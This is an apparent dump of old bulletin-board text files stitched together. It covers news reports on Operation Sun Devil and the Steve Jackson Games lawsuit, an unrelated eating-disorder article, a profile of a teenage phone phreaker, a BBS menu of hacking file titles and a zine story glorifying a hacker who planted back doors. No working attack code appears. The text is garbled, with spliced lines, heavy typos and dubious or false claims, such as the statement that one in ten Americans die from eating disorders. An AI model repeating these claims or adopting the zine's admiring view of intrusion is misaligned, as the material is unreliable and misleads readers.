as legitimate users, had secretly monitored communication on
computer bulletin boards. The agency also disclosed it has a new
Computer Diagnostic Center, in which the data on computer disks
seized in raids is evaluates by machines operation automatically.
  Civil liberties specialists view suck practices a potentially
harmful.

  "Computer mail unrelated to an investigation could be swept up in
the Government's electronic dragnet if the law is not carefully
tailored to a well defined purpose," said Marc Torenberg, the
Washington director for the Computer Professional for Social
Responsibility. 
  The Government's Operation Sun Devil was set up primarily to
fight a loose association of several dozen computer hobbyists,
including teenagers, who referred to themselves as the Legion of
Doom. [Publicity hogs incarnate] Members in various cities stayed
in touch through computer networks and bulletin board and exchanged
technical information of how to break into computer systems.

  In February a federal grand jury in Chicago indicted two members,
Craig Neidorf, 20 years old, and Robert J. Riggs, 21, for
exchanging a six-page document describing the operation of the
Southern Bell 911 emergency system.
                  Private Document Distributed

  The indictment, under the 1986 computer fraud law charges that in
December 1988 Mr. Rigs broke into a company computer and stole the
document, which the company valued at more than $76,000. He
transferred it to Mr. Niedorf by electronic mail on a bulletin
board in Lockport, Ill., the indictment said, and Mr. Niedorf later
reproduces it in an electronic newspaper. [I bet anything that
document is somewhere on this system. A lolly for anyone who finds
it - Dr. Strangelove] 
  Computer security experts say documents like the 911 description
are usually not taken for profit, but rather for the challenge of
doing it. Some members of the computer underground create elaborate
manuals on how to violate computer security as a sport or hobby.
  But law enforcement officials do no se it as a game. Because
modern society has come to depend on computer for so much of it's
government and commercial business, officials view intrusions as
threats not only to private property, but also to the very
operations of the systems.
  In another part of the Sun Devil investigation, Secret Service
agents in March confiscated from steve Jackson Games, a small
Austin, Tex., company. 
  Mr. Jackson, the company's president, sad the agents were seeking
a rule book for a fantasy game that deal with "cyberpunk," the
science fiction world where high technology and outlaw society
intersect.

  Mr. Jackson said he still did not know why his company had been
searched. He said the Secret Service officials had promised three
times to return his equipment and software but still had not done
so. He said he had been forced to lay off 8 of his 17 employees and
the that company was on the verge of going out of business. 
  "It raises first amendment questions," said Mr. Jackson. "it's a
frightening precedent. I don't think they would have done it to
I.B.M." 
  Law enforcement officials say they have difficulty returning
seized computers and software promptly. 
                      A Sweep in 14 Cities
The largest operation in the Sun Devil investigation came on May 8
when more than 150 Secret Service agents, plus state and local law-
enforcement officers, served the 28 search warrants in 14 cities:
Chicago, Cincinnati, Detroit, Los Angeles, Miami, Newark, Ne York,
Phoenix, Pittsburgh, Plano, Tex.; Richmond, Va.; San Diego; San
Jose, Calif., and Tuscon, Ariz. In all, seven people, including me.
riggs and Mr. Niedorf, have been arrested.

  In a separate investigation, the F.B.I. has been searching for a
year for members of a group that stole basic programming
information from Apple Computer and mailed coped to people in the
press and the computer industry. The group said that it stole the
software which is fundamental to the operation of Macintosh
computers, to protect apple's refusal to let other makers copy the
Macintosh. [Sounds like a dissambly of either the ROMs or the OS]
  The group calls itself the Neopromethus League, from the
character in Greek Mythology who stole fire from the gods. 
  Organizers of an annual West Coast computer meeting known as the
Hackers' conference said at least a dozen of the several hundred
people who atteneded last year's even had reported being recent;y
by the F.B.I. agents about the Apple theft.
  The Hackers' conference began in 1984 after the publication of
the book "Hackers" by Steven Levy, an account of computer industry
pioneer at M.I.T. and in Silicon Valley. 
  There is no evidence that the Apple theft was linger to people
who atteneded the Hacker's conference and Leo Cunningham, assistant
United States Attorney in San Jose, Calif., wound not comment on
any facet of the case. 

SIGN OF OUR TIMES
  by Rick Arnold
  
  It's a sad fact that a sign of our times is the frequency of eating 
disorders diagnosed in our youth -- a very serious illness if left 
untreated. One in ten (1 in 10) Americans, usually adolescents, die 
from various eating disorders, recognized by the National Institute 
of Mental Health. Nearly five percent of the population (figures from 
NIMH) suffer from *anorexia nervosa* and/or *bulimia nervosa*, with 
millions of others suffering from *binge eating*.

  The needless deaths of those with anorexia and bulimia, need not
occur, if family members and friends would help by recognizing the
problems and encourage the person to seek treatment. 

  *Anorexia nervosa* is a disorder where a person intentionally starves
themselves. The disorder, usually starts when the person reaches puberty,
and involves extreme weight loss -- at least fifteen percent (15%) below
an individual's normal body weight. This, in an effort to look and feel
the way they believe is the "normal" appearance for a person in their
peer group. Some suffering from anorexia will appear pale and emaciated
but feel they are overweight, and need to lose more weight to be acceptable 
in appearance. This can lead to hospitalization in an effort to prevent 
starvation.

  Their weight -- in particular -- and food become obsessions. The person's
compulsiveness is demonstrated by strange eating rituals or refusal to eat 
in front of others. Those with the disorder will often prepare extravagant
gourmet meals for family and friends, however will rarely partake of the
meals they have presented for the others. Often, they will have rigorous
and excessive exercise routines. A disruption or loss of the monthly
menstrual period is common for women with the disorder. Impotence often
affects men who have anorexia.

  *Bulimia nervosa* is quite dangerous, because the person frequently
uses an excessive amount of laxatives and/or diuretics, as the individual
purges their intake of calories and liquids attempting to lose weight. A
more drastic measure taken by these individuals is vomiting shortly after
eating. Frequently individuals use all of these methods, and will not be
detected because they maintain above or near normal body weight. 

  Those with this disorder often binge excessively, then purge the their
intake using one or all the methods mentioned, from once or twice a week 
to several times a day. Excessive dieting between episodes of binging and 
purging is quite common. Nearly half of those with anorexia will eventually 
develop bulimia. This condition typically begins in adolescent women, but 
also is found in men. Often the victims of this disorder will not seek help 
until in their thirties or forties, and the condition is more difficult to 
cure, due to the deeply ingrained habits developed over time.

  A similar disorder to bulimia is *binge eating*, however the person will
not practice purging, and is usually overweight because of their compulsive
indulging in over eating binges.  People with this disorder usually have
a history of extreme weight fluctuations. Two percent (2%) of the general
population suffer from this ailment, and is predominantly found in women
more so than men. Nearly thirty percent (30%) of people in supervised
weight control programs suffer from binge eating.

  The following symptoms are common to these eating disorders:
  
    AN=Anorexia   BN=Bulimia  BE=Binge Eating
    
    AN,      - Excessive weight loss in short period of time
    AN,      - Continuation of dieting although extremely thin
    AN,      - Dissatisfaction with appearance and weight, even if thin
    AN,BN,   - Loss of monthly menstrual periods
    AN,BN,   - Unusual interest in food, along with strange eating habits
    AN,BN,BE - Eating in secret
    AN,BN,   - Obsession with exercise
    AN,BN,BE - Serious depression
       BN,BE - Binging -- consumption of large amounts of food
       BN,   - Use of drugs for vomiting, bowel movements and urination
       BN,   - Food binging with no noticeable weight gain
       BN,   - Long periods of time spent in bathroom -- to induce vomiting
       BN, BE- Abuse of drugs and/or alcohol              
          
  The causes of eating disorders are complex and involve, personalities,
environments, genetics, and biochemistry of each individual. Shared traits
among those with eating disorders are: low self-esteem, feelings of help-
lessness, and fear of becoming fat. Those with anorexia tend to be good
students, excellent athletes, and *perfectionists*. They place a high
priority on pleasing others -- over their own needs and wishes. To gain a
sense of control in their lives, they restrict themselves to eating only
certain types of foods and only in limited amounts. This need for control
of their bodies serves a twofold purpose: fulfills the desire to please
others by being thin, therefore appealing; and allows *THEM* to have control
over someone -- even if it is themselves. 

  Binge eaters (most often bulimic) release stress through eating large 
quantities of food -- especially junk food -- in their effort to rebel, and
relieve anxiety; often in response to feeling dominated. The binging often
brings on guilt and depression after the impulsive behavior; and the
bulimic is more likely to engage in a risky life style of abuse for drugs
and alcohol. 

  Much of the cause for these eating disorders can be traced to an overly
concerned parent, who wishes their child to be physically attractive and
accepted by society. Parents or older siblings, who pursue activities such 
as dancing, athletics, or modeling, or professions where appearance is 
very important, often create an environment that causes an eating disorder
to develop in the younger child(ren).

  What can you do to help?  Often psychotherapy is needed -- depending on
the severity of the disorder, and how late it is discovered. Treatment can 
save the life of one with an eating disorder. Family members and friends 
can contact local hospitals or medical centers to find out specific 
information about eating disorders, how to cope with them and how to
provide support for the person who suffers from the illness. Even if the
person obtains treatment, support and understanding from friends and
family are needed to provide an environment conducive to wellness and 
recovery.

  The most helpful thing *YOU* can do, treat your children the way you
would like to be treated. As a parent, there will be times when sitting
at the supper table -- it is better to *bite* your tongue! `Spare the rod;
spoil the child' -- has some merit; perhaps it should be: spare the lashing
(tongue-lashing that is), and DO NOT denigrate your children.

ADDITIONAL HELP:

   National Association of Anorexia Nervosa  
   and Associated Disorders (ANAD)
   PO Box 7
   Highland Park, IL 60035
   Phone: (708) 831-3438

   Center for the Study of Anorexia and Bulimia
   1 West 91st Street
   New York, NY 10024
   Phone: (212) 595-3449

   Bulimia Anorexia Self Help, Inc. (BASH)
   6125 Clayton Avenue, Suite 215
   St. Louis, MO 63139
   Phone: (314) 567-4080

Copyright 1994 Rick Arnold   
============================     # # #     ================================

W


==)--- P TO PAUSE S TO STOP ---(==



 HERE IS AN ARTICLE ON ONE ,OF P-80'S MEMBERS WHO MANAGED TO 
DIG UP A LITTLE PUBLICITY. SILVER SPY. FROM THE U.S. NEWS AND 
WORLD REPORT (JUNE 3 85)

  WORLD OF SPY,17 YR OLD TINKER

  Silver Spy has everything going for him-comfortable  surroundings, a father who is an engineer. He ranks in the top 3 percent of his high-school class.  His SAT scores for college admission totaled 1,400 of a possible 1,600. He wants to attend Stanford or the Massachusetts  Institute of Technology. But in the eyes of the phone companies  he is a thief, and in the eyes of the law he's a criminal. Such  is the portrait of this 17-year-old computer "hacker" and phone  "phreaker who lives about 20 miles outside Boston. He spoke with U.S.News & World Report on the condition that neither his real  name nor hometown be revealed. Catch 22. Silver Spy runs one of  the most exclusive bullentin boards in the nation. Called Catch  22, it will have no more than 20 users, whose credentials will  be carefully checked. Silver Spy, who owns two personal  computers, wants to keep the user list small so that his board  is not infiltrated by authorities. He terminated Spy Master, an  earlier system, because of messages he received that threatened  him with arrest. He believes they came from FBI agents. The  youth says he has hacked, or tinkered, in a number of university and commercial computers, including some belonging to banks. But he maintains that he has never damaged a computer or compromised private information. "I'm out to learn as much as I can about a  system and not do any damage," he says. "I know people who  delete [destroy] files when they get into a commercial computer. There are little 12-year-olds who are so ecstatic about getting  into a computer that they fill all its memory with the  words,"Hacker was here." Phone phreaking-making toll calls that  are billed to other users-is another story: "Since most of the  people and boards I talk to are out ot state, I generally don't  pay for the phone calls. Some people could say it's immoral. I  know it's illegal." Then how does he justify calls for which  others are asked to pay? "I don't," replies Silver Spy.

  DOWNLOADED FROM P-80 SYSTEMS....





LIBRARY MENU #3




<A>Fone Scrambling
<B>Stepline Fun
<C>Crashing NW/GBBS
<D>Wiretapping
<E>Tone SignaUnauthorised Access UK  0636-708063  10pm-7am  12oo/24oo

Hackers Cove  8:30pm-7am  +44 (0)204 792642  v21/22/22bis/23/32/32bis/42bis

                                  HACKING
                      THE CASE OF EDWARD AUSTIN SINGH
               THIS FILE WAS RIPPED FROM ZINE DISK MAGAZINE
             AND EDITED TO 80 CULUMN TEXT BY /\STERiX/CYANIDE

Here is a fairly old but not publicised enough article on a famous hacker. One
single Sunday afternoon a programmmer remained preoccupied at Guildford 
University in England.  His name, Edward Austin Singh. His preoccuption
included browsing through computer files on a military network in the 
United States, He was connected to another computer in Germany via the one
in America, his satellite link crossed and recrossed the Atlantic, He was once
again Hacking into an important system. That day at 7.10pm he was caught by a
detective Superintendent and a detective inspector of Scotland Yard's serious 
crime squad whom walked in and passed across their police identification 
cards. Singh  had no choice but to admit to all his computer crimes.  He 
explained to them that he would break into systems by one particular sceme 
that worked very well. He wrote a capture program that grabbed people's
passwords.  They thought it was just the terminal asking for their passwords,
but it stored them and Singh would collect them later. During his exploration,
the more he hacked, the more hackers he came into contact with, always 
leaving messages or answering queries on various Bulletin Boards and chat
systems.  Singh penitreted these systems completely, in most cases he could
gain super-user or system manager privileges and he got into everything
connected up to the network. If Singh couldn't get into a system then all he 
would do was contact someone else through another Bulletin Board and they 
would help him. While he was browsing through various boards, he found valid
credits cards with numbers on them, so thanks to hackers like Singh we were
all able to start `Phreaking'. He had broken into NASA and examined details of
a project which was being planned, it included details of an unmanned mission
to Mars!  He also found his way into Nuclear power stations and he explored a 
space defence centre operated by a US government arms manufacturer. 
There was no system in the whole world which could keep him out!  When he
was bored, he would break into a system and put a back door into it and he 
would send messages to the Sysop telling him that he had been penetrated by 
hackers, then he would wait and see if the Sysop could keep him out. Usually 
they just changed the passwords and never found the back door. It is amazing
to know that half of the people that run these systems have absolutely no idea 
what the hell is going on! Operations to catch Singh were going on for at least
 six months by the United States Secret Service. But even Singh already knew 
that they were onto him before he was caught, because of a message left on a 
BBS by another hacker warning him that the US head office was awaring of 
Hacking in his general area and they had isolated him and wanted his name. 
Many System owners became very unhappy when Singh admitted to, and showed how 
he broke into those Systems because some of them appeared to be absolutely 
vulnerable to infiltration. 
When Singh was arreseted he estimated that he had about 250 systems under his 
control, which were computer sites that he could enter anytime again at his own 
will. 
Beleive it or not, Singh's did not recieve any punishment for all of his 
activities! he got let off with a strict warning! 
Also, to his good fortune of being caught he obtained a job as a software 
security consultant. `You have to be a hacker to catch a hacker' one has 
always said. 
Singh's main goal, before he was caught was total world domination! He wanted 
everything under his very own control.  It was the ULTIMATE game on the 
ULTIMATE scale.  He got a thrill out of beating the systems, and having so 
much power. 
Saying that Singh was obsessed was a gross understatement! (aren't we all
obsessed in one way or another when dealing with computers?) The sheer 
scope of fraud, espionage and damage had never been greater. Singh was 
one of the best hackers in this generation, although his efforts breaking
into alot of systems were not all that hard to achieve.  But it involved a 
lot of time, patience and instinct which Singh seemed to have as a second 
nature. Hacking is not only a past-time, but for many people it is an 
art-form. 

                Bandit/Mystix

                         ------------------------

Downloaded From P-80 International Information Systems 304-744-2253
Steve Jackson Games/Secret Service Lawsuit -- Day One

By JOE ABERNATHY
Copyright 1993, Houston Chronicle

	AUSTIN -- Plaintiff's attorneys wrested two embarrassing 
admissions from the United States Secret Service on the opening day of a 
federal civil lawsuit designed to establish the bounds of constitutional 
protections for electronic publishing and electronic mail.
	In the first, Special Agent Timothy Foley of Chicago admitted that 
crucial statements were erroneous in an affidavit he used to conduct 
several search-and-seizure operations in a March 1990 crackdown on 
computer crime.
	Foley later conceded that the Secret Service's special training 
for computer crime investigators overlooks any mention of the law that 
regulates the extent of permissible search-and-seizures at publishing 
operations.
	The case, brought by Steve Jackson Games, an Austin firm, is being 
tried before United States District Judge Sam Sparks. Carefully nurtured 
over the course of three years by a group of electronic civil rights 
activists -- at a cost of more than $200,000 -- the case has been 
eagerly anticipated as a possible damper on what is seen as computer 
crime hysteria among federal police.
 	Plaintiffs hope to prove that the printed word exists just as 
surely on the computer screen as it does on a sheet of paper. The 
complaint also seeks to establish the right of computer users to 
congregate electronically on bulletin board systems -- such as one 
called Illuminati that was taken from Steve Jackson Games -- and to 
exchange private electronic mail on such BBSs.
	"This lawsuit is just to stand up and say, at the end of the 20th 
Century, that publishing occurs as much on computers as on the printed 
page," said Jim George, of the Austin firm George, Donaldson & Ford, 
Jackson's law firm. 
	That issue came into sharp focus during George's questioning of 
Foley regarding the seizure of the PC on which Illuminati ran, and 
another computer on which was stored the word processing document 
containing a pending Steve Jackson Games book release, GURPS Cyberpunk.
	"At the Secret Service computer crime school, were you, as the 
agent in charge of this investigation, made aware of special rules for 
searching a publishing company?" George asked Foley. He was referring to 
the Privacy Protection Act, which states that police may not seize a 
work in progress from a publisher. It does not specify what physical 
form such a work must take.
	"No, sir, I was not," Foley responded.
	"Did you just miss class the day that was taught?" George asked.
	"No, sir. The United States Secret Service does not teach its 
agents about special rules regarding search and seizure at publishing 
companies," Foley said.
	"Let the record clearly show that to be the case," George said.
	Earlier, Foley admitted on the witness stand that his original 
affidavit seeking a judge's approval to raid Steve Jackson Games 
contained a fundamental error.
	During the March 1990 raid -- one of several dozen staged that day 
around the country in an investigation that the Secret Service called 
Operation Sun Devil at the time -- agents were seeking copies of a 
document taken as a hacker trophy from BellSouth. Subsequently 
republished in an electronic magazine called Phrack, thousands of copies 
of the document were stored on bulletin board systems around the nation.
	Neither Jackson nor his company were suspected of wrongdoing, and 
no charges have ever been filed against anyone targeted in several 
Austin raids. The alleged membership of Steve Jackson employee Loyd 
Blankenship in the Legion of Doom hacker's group -- which was believed 
responsible for the break-in -- led agents to raid the Austin game 
publisher at the same time that Blankenship's Austin home was raided.
	Yet the only two paragraphs in the 42-paragraph indictment that 
established a connection between Blankenship's alleged illegal 
activities and Steve Jackson Games were shown to have been erroneously 
arrived at, when George produced a statement by Bellcore expert Henry 
Kluepfel disputing statements attributed to him in Foley's affidavit.
	"Is it true that Mr. Kluepfel logged onto (Illuminati)?" George 
questioned.
	"No, sir," Foley responded.
	"But you state that in your affidavit," George said.
	"That was a misattribution," Foley said.
	"So you had no knowledge that anything was sent to my client?"
	"No sir, not directly," Foley said.
	"Indirectly?" George asked.
	"No sir."
	The Justice Department, in papers filed with the court, contends 
that only traditional journalistic organizations enjoy the protections 
of the Privacy Protection Act. It further contends that users of 
electronic mail have no reasonable expectation of privacy.
	The trial was to resume at 8:30 a.m. It is expected to conclude on 
Thursday or Friday.
Steve Jackson Games/Secret Service Trial -- Day Two

By JOE ABERNATHY
Copyright 1993, Houston Chronicle

	AUSTIN -- A young woman read aloud a deeply personal friendship 
letter Wednesday in a federal civil lawsuit intended to establish the 
human dimension and constitutional guarantees of electronic assembly and 
communication.
	Testimony indicated that the letter read by Elizabeth Cayce-McCoy 
previously had been seized, printed and reviewed by the Secret Service.
	Her correspondence was among 162 undelivered personal letters 
testimony indicated were taken by the government in March 1990 during a 
raid on Steve Jackson Games, which ran an electronic bulletin board 
system as a service to its customers.
	Attorneys for the Austin game publisher contend that the seizure 
of the bulletin board represents a violation of the Electronic 
Communications Privacy Act, which is based on Fourth Amendment 
protections against unreasonable search and seizure.
	"Because you bring such joy to my friend Walter's life, and also 
because I liked you when I met you, though I wish I could have seen your 
lovely face a little more, I'll send you an autographed copy of 
Bestiary," said McCoy, reading in part from a letter penned by Steffan 
O'Sullivan, the author of the GURPS Bestiary, a fantasy treatise on 
mythical creatures large and small.
	Although the correspondence entered the public record upon McCoy's 
reading, the Chronicle obtained explicit permission from the principles 
before excerpting from it.
	The electronic mail was contained on the game publisher's public 
bulletin board system, Illuminati, which allowed game-players, authors 
and others to exchange public and personal documents. After agents 
seized the BBS during a raid staged as part of a nationwide crackdown on 
computer crime, Secret Service analysts reviewed, printed and deleted 
the 162 pieces of undelivered mail, testimony indicated.
	When the BBS computer was returned to its owner several months 
later, a computer expert was able to resurrect many of the deleted 
communications, including McCoy's friendship letter.
	"I never thought anyone would read my mail," she testified. "I was 
very shocked and embarrassed.
	"When I told my father that the Secret Service had taken the Steve 
Jackson bulletin board for some reason, he became very upset. He thought 
that I had been linked to some computer crime investigation, and that 
now our computers would be taken."
	O'Sullivan, who is a free-lance game writer employed by Steve 
Jackson, followed McCoy to the stand, where he testified that agents 
intercepted -- via the Illuminati seizure -- a critical piece of 
electronic mail seeking to establish when a quarterly royalty check 
would arrive. 
	"That letter never arrived, and I had to borrow money to pay the 
rent," he said.
	No charges were ever filed in connection with the raid on Steve 
Jackson Games or the simultaneous raid of the Austin home of Jackson 
employee Loyd Blankenship, whose reputed membership in the Legion of 
Doom hackers' group triggered the raids.
	Plaintiffs contend that the government's search-and-seizure 
policies have cast a chill over a constitutionally protected form of 
public assembly carried out on bulletin boards, which serve as community 
centers often used by hundreds of people. More than 300 people were 
denied use of Jackson's bulletin board, called Illuminati, for several 
months after the raid, and documents filed with the court claim that a 
broader, continuing chill has been cast over the online community at 
large.
	The lawsuit against the Secret Service seeks to establish that the 
Electronic Communications Privacy Act guarantees the privacy of 
electronic mail. If U.S. District Court Judge Sam Sparks accepts this 
contention, it would become necessary for the government to obtain 
warrants for each caller to a bulletin board before seizing it.
	The Justice Department contends that users of electronic mail do 
not have a reasonable expectation to privacy, because they are 
voluntarily "disclosing" their mail to a third party -- the owner of the 
bulletin board system.
	"We weren't going to intercept electronic mail. We were going to 
access stored information," said William J. Cook, a former assistant 
U.S. Attorney in Chicago who wrote the affidavit for the search warrant 
used in the Steve Jackson raid.
	The Justice Department attorneys did not substantially challenge 
testimony by any of the several witnesses who were denied use of 
Illuminati. They did, however, seek to prevent those witnesses from 
testifying -- by conceding their interests -- after Cayce's compelling 
appearance led off the series of witnesses.
	Most of the Justice Department's energies were directed toward 
countering damage claims made by Steve Jackson, whose testimony opened 
the second day of the trial. Most of the day's testimony was devoted to 
a complex give-and-take on accounting issues. Some $2 million is being 
sought in damages.
	Justice sought to counter the widely repeated assertion that Steve 
Jackson Games was nearly put out of business by the raid by showing that 
the company was already struggling financially when the raid was 
conducted. An accountant called by the plaintiffs countered that all of 
Jackson's financial problems had been corrected by a reorganization in 
late 1989.
Index: Day Three of the Steve Jackson Games/Secret Service Lawsuit. The
judge spent time straight reprimanding a Agent of the Secret Service for
the behavior regarding the raid and subsequent investigation of Steve
Jackson Games. Report by Joe Abernathy of Houston Chronicle. 

Paco X Nathan: Steve Jackson Games - Day 3
Fri, 29 Jan 1993 11:12

Steve Jackson Games/Secret Service wrapup

By JOE ABERNATHYCopyright 1993, Houston Chronicle


        AUSTIN -- An electronic civil rights case against the Secret 
Service closed Thursday with a clear statement by federal District Judge 
Sam Sparks that the Service failed to conduct a proper investigation in 
a notorious computer crime crackdown, and went too far in retaining 
custody of seized equipment.
        The judge's formal findings in the complex case, which will 
likely set new legal precedents, won't be returned until later.
        A packed courtroom sat on the edge of the seat Thursday morning 
as Sparks subjected the Secret Service agent in charge of the 
investigation to a grueling dressing-down.
        The judge's rebuke apparently convinced the Department of 
Justice to close its defense after calling only that one of the several 
government witnesses on hand. Attorney Mark Battan entered subdued  
testimony seeking to limit the award of monetary damages.
        Secret Service Special Agent Timothy Foley of Chicago, who was 
in charge of three Austin computer search-and-seizures on March 1, 1990, 
that led to thelawsuit, stoically endured Spark's rebuke over the 
Service's poor investigationand abusive computer seizure policies. While 
the Service has seized dozens of computers since the crackdown began in 
1990, this is the first case to challenge the practice.
        "The Secret Service didn't do a good job in this case. We know 
no investigation took place. Nobody ever gave any concern as to whether 
(legal) statuteswere involved. We know there was damage," Sparks said in 
weighing damages.
        The lawsuit, brought by Steve Jackson Games of Austin, said that 
the seizure of three computers violated the Privacy Protection Act, 
which provides First Amendment protections against seizing a publisher's 
works in progress. The lawsuit further said that since one of the 
computers was being used to run a bulletin board system containing 
private electronic mail, the seizure violated the Electronic 
Communications Privacy Act in regards to the 388 callers of the 
Illuminati BBS.
        Sparks grew visibly angry when it was established that the 
Austin science fiction magazine and game book publisher was never 
suspected of a crime, and that agents did not do even marginal research 
to establish a criminal connectionbetween the firm and the suspected 
illegal activities of an employee, or to determine that the company was 
a publisher. Indeed, agents testified that they were not even trained in 
the Privacy Protection Act at the special Secret Service school on 
computer crime.
        "How long would it have taken you, Mr. Foley, to find out what 
Steve Jackson Games did, what it was?" asked Sparks. "An hour?
        "Was there any reason why, on March 2, you could not return to 
Steve Jackson Games a copy, in floppy disk form, of everything taken?
        "Did you read the article in Business Week magazine where it had 
a picture of Steve Jackson -- a law-abiding, tax-paying citizen -- 
saying he was a computer crime suspect?
        "Did it ever occur to you, Mr. Foley, that seizing this material 
could harm Steve Jackson economically?"
        Foley replied, "No, sir," but the judge offered his own answer.
        "You actually did, you just had no idea anybody would actually 
go out and hire a lawyer and sue you."
        More than $200,000 has been spent by the Electronic Frontier 
Foundationin bringing the case to trial. The EFF was founded by Mitchell 
Kapor amid a civil liberties movement sparked in large part by the 
Secret Service computer crimecrackdown.
        "The dressing-down of the Secret Service for their behavior is a 
major vindication of what we've been saying all along, which is that 
there were outrageous actions taken against Steve Jackson that hurt his 
business and sent a chilling effect to everyone using bulletin boards, 
and that there were larger principles at stake," said Kapor, contacted 
at his Cambridge, Mass., office.
        "We're very happy with the way the case came out," said Shari 
Steele, who attended the case as counsel for the EFF. "That session with 
the judge and Tim Foley is what a lawyer dreams about."
        That session seemed triggered by a riveting cross-examination of 
Foley by Pete Kennedy, Jackson's attorney.
        Kennedy forced Foley to admit that the search warrant did not 
meet even the Service's own standards for a search-and-seizure, and did 
not establish that Jackson Games was suspected of being involved in any 
illegal activity.
        "Agent Foley, it's been almost three years. Has Chris Goggans 
been indicted? Has Loyd Blankenship been indicted? Has Loyd 
Blankenship's computer been returned to him?"
        The purported membership of Jackson Games employee Blankenship 
in the Legion of Doom hacker's group triggered the raids that day on 
Jackson Games, Blankenship's home, and that of Goggans, a Houstonian who 
at the time was a University of Texas student. No charges have been 
filed, although the computer seized from Blankenship's home -- 
containing his wife's dissertation -- never has been returned.
        After the cross-examination, Sparks questioned Foley on a number 
of keydetails before and after the raid, focusing on the holes in the 
search warrant,why Jackson was not allowed to copy his work in progress 
after it was seized, and why his computers were not returned after the 
Secret Service analyzed them, aprocess completed before the end of 
March.
        "The examination took seven days, but you didn't give Steve 
Jackson's computers back for three months. Why?" asked an incredulous 
Sparks. "So here you are, with three computers, 300 floppy disks, an 
owner who was asking for it back, his attorney calling you, and what I 
want to know is why copies of everything couldn't be given back in days. 
Not months. Days.
        "That's what makes you mad about this case."




STEVE JACKSON GAMES WINS LAWSUIT 
AGAINST U.S. SECRET SERVICE


A games publisher has won a lawsuit against the U.S. Secret Service and the 
federal government in a ground-breaking case involving computer publications 
and electronic mail privacy.

In a decision announced in Austin, Texas, on March 12, Judge Sam Sparks of the
federal district court for the Western District of Texas announced that the
case of Steve Jackson Games et al. versus the U.S. Secret Service and the 
United States Government has been decided for the plaintiffs.

The plaintiffs, which include Steve Jackson, the company he founded, and three
users of the company's bulletin board system (BBS), sued the government on 
claims that their statutory rights to electronic mail privacy had been 
violated when the BBS and other computers, disks and printouts were seized by 
the Secret Service as part of a computer crime investigation.  These rights 
are protected under the Electronic Communications Privacy Act (ECPA), which 
extended most of the protections of the federal Wiretap Act ("Title III") to 
electronic mail.

Jackson and his company also claimed violations of the Privacy Protection Act 
of 1980, a federal law designed to limit searches of publishers in order to 
protect their First Amendment rights.

Mitch Kapor, founder and chairman of the board for the Electronic Frontier 
Foundation, the public interest/civil liberties organization that has 
underwritten and supported the case since it was filed in 1991, said he is 
pleased with the decision.  "This decision vindicates our position that users 
of computer bulletin board systems are engaging in Constitutionally protected 
speech," Kapor said.

"This decision shows that perseverance pays off," he added.  "We've been at 
this for almost three years now, and we still don't know if it's over -- the 
Justice Department might appeal it."  Nevertheless, Kapor said he is 
optimistic about the case's ultimate outcome.

Judge Sparks awarded more than $50,000 in damages to Steve Jackson Games, 
citing lost profits and violations of the Privacy Protection Act of 1980.  
In addition, the judge awarded each plaintiff $1,000 under the Electronic 
Communications Privacy Act for the Secret Service seizure of their stored 
electronic mail.  The judge also stated that plaintiffs would be reimbursed 
for their attorneys's fees.

The judge did not find that Secret Service agents had "intercepted" the 
electronic communications that were captured when agents seized the Illuminati 
BBS in an early morning raid in the spring of 1990 as part of a computer crime 
investigation.  The judge did find, however, that the ECPA had been violated 
by the agents's seizure of stored electronic communications on the system.

The case was tried in Austin, Texas, by the Austin-based media law firm 
George, Donaldson & Ford, with case assistance provided by the 
Boston, Massachusetts, law firm of Silverglate & Good.

Pete Kennedy, the lawyer from George, Donaldson & Ford who litigated the 
case, calls the decision "a solid first step toward recognizing that computer 
communications should be as well-protected as telephone communications."  
Kennedy also said he believes the case has particular significance for those 
who use computers to prepare and distribute publications.  "There is a strong 
indication from the judge's decision that the medium of publication is 
irrelevant," he said, adding that "electronic publishers have the same 
protections against law enforcement intrusions as traditional publishers like 
newspapers and magazines.  All publishers that use computers should be 
heartened by this decision.  It indicates that the works-in-progress of all 
types of publications are protected under the Privacy Protection Act.

"The case also demonstrates that there are limits on the kinds of defenses law 
enforcement agents can use, Kennedy said, noting that "the judge made it very 
clear that it is no excuse that the seizure of draft material for publication 
held on a computer was incidental or accidental."

Mike Godwin, an attorney for the Electronic Frontier Foundation who has worked 
on the case since 1990, said he is pleased with the scope of the decision.  
"This case is a major step forward in protecting the rights of those who use 
computers to send private mail to each other or who use computers to create 
and disseminate publications."


Press contact:  Mike Godwin
Work:  617-576-4510
Pager:  1-800-SKYPAGE, 595-0535
The following is taken from a recent issue of Government Computer Week:

    The House Judiciary Committee is considering a proposal that the Federal
  Bureau of investigation and Secret Service report regularly to Congress on
  the extent to which the two law-enforcement agencies monitor computer
  bulletin boards.
    A committee spokesman said law makers are considering ways to increase
  oversight of the agencies' computer surveillance activities in proposed
  amendments to the Computer Fraud and Abuse Statute of 1984.
   "We're not so much interested in the privacy issue that such investigations
  raise; we're bothered more by the lack of checks and balances that keep [the
  FBI and Secret Service] from doing sting operations," said a spokesman for
  the committee. "The staff has considered proposing that the FBI and Secret
  Service report to Congress on a regular basis as to what they're doing in the
  area."
    The committee is particularly concerned with the amount of electronic
  bulletin board monitoring conducted by the Secret Service. "The FBI monitors,
  but not that much because it's not cost-effective," the spokesman said. "But
  the Secret Service is doing a hell of a lot of monitoring."
    The Secret Service "has primary jurisdiction in those cases which are
  initiated outside a bank and do not involve organized crime, terrorism or
  foreign counterintelligence," according to Secret Service Director John
  Simpson in a letter responding to Judiciary Committee inquiries on the range
  of the agency's computer investigations.
    Top Secret Service officials and the rank and file deny they conduct
  widespread or indiscriminate bulletin board surveillance, saying that they do
  not have the time or the resources to do so. "If someone thinks we have the
  resources to monitor all the bulletin boards on the area, they're wrong."
  said Rich Adams, a special agent. "We have better things to do with our 4,300
  employees."
    The Service said its investigations are usually a direct response to tips
  from informants or are started from other sources, such as a telephone
  company. "In the investigations we do select, it is not our intention to
  attempt to supplant local or state law enforcement," said Simpson in his
  letter to the committee.
    Much of the computer work done by the Secret Service is in investigating
  access-device frauds that are discussed in pirate bulletin boards., Simpson
  said in his letter. Access device frauds are those crimes in which an
  "authorized" user gains illegal access to automatic teller machines, personal
  identification numbers, long distance telephone access codes or computer
  passwords.
    This information is often placed on underground bulletin boards for other
  computer users to exploit. "I've seen everything from smut to a recipe for
  making a bomb," said Mike Focke, a private citizen who compiles and publishes
  a list of IBM bulletin boards monthly. He added that he "would not be able to
  penetrate that illegal network [but] would dial onto the board, and a message
  would be posted that I suspected they were up to no good."
    Earl Devany, special agent in charge of the Fraud Division of the Secret
  Service, said the Service is not in the business of eavesdropping on computer
  buffs. But he added that the Service does conduct surveillance on those
  suspected of illegal activity.
